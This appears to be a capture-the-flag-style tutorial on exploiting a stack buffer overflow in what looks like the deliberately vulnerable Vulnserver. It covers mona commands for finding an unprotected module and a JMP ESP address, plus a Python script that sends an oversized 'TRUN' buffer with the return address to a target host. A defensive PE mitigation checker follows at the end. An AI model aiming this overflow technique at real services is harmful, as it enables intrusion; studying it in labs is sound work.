Finding RIGHT Module

PRACTICE ! PRACTICE ! PRACTICE !

Finding the right module means locating a DLL loaded by the program that has NO memory protections enabled, such as DEP, ASLR or SafeSEH. A return address taken from such a module stays valid across restarts and is not rejected by the exception-handler checks.

Download mona.py and place it in the debugger's PyCommands directory.

To list the loaded modules and their protections with mona, use the command

!mona modules
  • In the output there is a module called essfunc.dll whose memory protections are all set to False

  • Now the last thing to do is find the opcode equivalent of JMP ESP. To do that:

$ /usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
nasm> JMP ESP
FFE4
  • Now use mona to search essfunc.dll for the opcode bytes FF E4 with the command

!mona find -s "\xff\xe4" -m essfunc.dll

Let's try out the first return address mona reports, which is 0x625011af

Now let's write a Python script to automate this

#!/usr/bin/python

import sys, socket

# The return address 0x625011af is written byte-reversed (\xaf\x11\x50\x62) because x86 is little-endian
shellcode = b"A" * 2003 + b"\xaf\x11\x50\x62"

try:
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect(('192.168.0.104', 9999))	# target host and port

	s.send(b'TRUN /.:/' + shellcode)	# send bytes so this runs on both Python 2 and 3
	s.close()

except socket.error:

	print("Error !")
	sys.exit()
  • Before executing the script, set a breakpoint on the JMP ESP instruction at 625011af

F2 sets a breakpoint at the JMP ESP address; now let's run the script!
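The two things this page relies on, a module whose DEP/ASLR bits are all False and a return address packed little-endian, can be checked outside the debugger. The following is an added example, not code from the page or from mona: it reads the DllCharacteristics field from a PE header to report which mitigations a module opts in to, and packs the return address with struct instead of reversing it by hand. The minimal_pe helper and the header-only image it builds are constructed for the self-test; SafeSEH is recorded in the load-config directory and is assumed out of scope here.

```python
import struct

# IMAGE_DLLCHARACTERISTICS bits from the PE optional header (Microsoft PE format spec).
DYNAMIC_BASE = 0x0040  # image opts in to ASLR
NX_COMPAT = 0x0100     # image opts in to DEP
NO_SEH = 0x0400        # image declares it uses no SEH handlers

def pe_mitigations(data):
    """Report the opt-in mitigation bits of a PE image, the same properties
    mona lists per module. SafeSEH (load-config directory) is not parsed here."""
    if data[:2] != b"MZ":
        raise ValueError("not a PE image (missing MZ header)")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    opt = e_lfanew + 4 + 20                      # skip signature and COFF file header
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic not in (0x10B, 0x20B):              # PE32 / PE32+
        raise ValueError("unknown optional header magic 0x%x" % magic)
    # DllCharacteristics sits at offset 70 in both PE32 and PE32+ optional headers
    dllchars = struct.unpack_from("<H", data, opt + 70)[0]
    return {"aslr": bool(dllchars & DYNAMIC_BASE),
            "dep": bool(dllchars & NX_COMPAT),
            "no_seh": bool(dllchars & NO_SEH)}

def missing_mitigations(data):
    """Names of the mitigations a module does not opt in to (what mona shows as False)."""
    return [name for name, on in pe_mitigations(data).items() if not on]

def ret_address_bytes(addr):
    """Pack a 32-bit address little-endian: 0x625011af -> b'\\xaf\\x11\\x50\\x62'."""
    return struct.pack("<I", addr)

def minimal_pe(dllchars):
    """Constructed header-only PE32 image for the self-test; not a real DLL."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)      # e_lfanew: PE signature follows the DOS header
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 0, 0, 0, 0, 0xE0, 0x2102)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)        # PE32 magic
    struct.pack_into("<H", opt, 70, dllchars)
    return bytes(dos) + coff + bytes(opt)

if __name__ == "__main__":
    print(missing_mitigations(minimal_pe(0)))                         # ['aslr', 'dep', 'no_seh']
    print(missing_mitigations(minimal_pe(DYNAMIC_BASE | NX_COMPAT)))  # ['no_seh']
    print(ret_address_bytes(0x625011af))                              # b'\xaf\x11Pb'
```

Run it against a real DLL with pe_mitigations(open(path, "rb").read()); a module that comes back with every bit False is the kind mona flags, and rebuilding it with /DYNAMICBASE and /NXCOMPAT is the fix on the defending side.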
